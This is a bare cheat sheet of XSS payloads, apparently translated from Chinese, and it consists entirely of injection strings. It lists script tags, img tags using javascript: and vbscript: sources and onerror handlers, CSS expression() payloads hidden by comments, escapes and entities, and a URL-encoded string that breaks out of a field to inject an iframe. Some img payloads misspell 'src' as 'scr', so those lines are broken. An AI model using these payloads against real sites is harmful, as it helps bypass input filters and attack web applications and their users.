<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/* */ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["